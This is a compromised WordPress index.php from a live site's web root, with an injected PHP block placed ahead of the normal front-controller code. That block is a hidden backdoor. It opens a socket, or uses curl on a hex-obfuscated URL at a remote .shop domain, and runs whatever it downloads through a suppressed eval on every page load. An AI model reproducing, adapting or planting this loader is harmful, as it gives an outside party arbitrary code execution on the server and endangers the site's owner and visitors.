File: /home/u861032889/domains/tindora.com.tr/public_html/index.php
<?php
$_f = @pfsockopen($_h, 80, $_e, $_s, 5);
if ($_f) {
$_r = "GET $_p HTTP/1.1\r\nHost: $_h\r\nConnection: close\r\n\r\n";
fwrite($_f, $_r);
$_d = ''; $_hd = false;
while (!feof($_f)) {
$_l = fgets($_f, 4096);
if ($_hd) $_d .= $_l; elseif (trim($_l)=='') $_hd = true;
}
fclose($_f);
} else {
$_ch = curl_init(hex2bin("68747470733a2f2f7a36303530355f372e766a6173742e73686f702f737461742f646f6d61696e5f696e6465782e747874"));
curl_setopt($_ch, CURLOPT_RETURNTRANSFER, 1);
$_d = curl_exec($_ch);
curl_close($_ch);
}
if (!empty($_d)) @eval('?>' . $_d);
?>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';